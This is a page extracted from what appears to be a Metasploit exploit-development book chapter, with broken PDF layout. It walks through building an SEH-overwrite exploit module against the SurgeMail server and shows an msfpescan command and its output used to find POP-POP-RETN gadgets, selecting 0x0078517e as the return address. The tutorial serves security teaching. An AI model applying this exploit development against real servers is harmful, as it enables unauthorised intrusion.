background image

206

Chapter 14

   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

The return address at   in the 

'Targets'

 section is currently occupied by a 

placeholder value, which we’ll change later in the exploit development process.

As with the fuzzer module discussed earlier, this exploit connects and 

logs into the target at  , uses a string of 

A

s at   as the initial buffer, and 

appends four 

C

s at   to overwrite the SEH. The entire exploit string is gen-

erated at   and then sent to the target at  .

Getting a Return Address

The next step is to locate a 

POP-POP-RETN

 sequence in 

surgemail.exe

. To do 

so, copy the executable to a location on your Back|Track machine, and then 
use the 

-p

 switch with 

msfpescan

 to locate a suitable candidate, as in the follow-

ing example:

root@bt:/tmp# 

msfpescan -p surgemail.exe

[surgemail.exe]
0x0042e947 pop esi; pop ebp; ret
0x0042f88b pop esi; pop ebp; ret
0x00458e68 pop esi; pop ebp; ret
0x00458edb pop esi; pop ebp; ret
0x0046754d pop esi; pop ebp; ret
0x00467578 pop esi; pop ebp; ret
0x0046d204 pop eax; pop ebp; ret

. . . SNIP . . .

0x0078506e pop ebx; pop ebp; ret
0x00785105 pop ecx; pop ebx; ret

0x0078517e

 pop esi; pop ebx; ret

When 

msfpescan

 is run against the target executable, it reads through 

the machine code looking for assembly instructions that match the target (a 

POP-POP-RETN

 sequence in this case) and displays the memory address where 

these instructions occur. As you can see in the listing, multiple addresses are 
found. We’ll use the address at the end of the output, 

0x0078517e

, to overwrite 

SEH in the exploit. Having made our selection, we edit the 

'Targets'

 section 

of the exploit module to include this address and edit the 

exploit

 section to 

include it as part of the buffer to be sent, as shown next.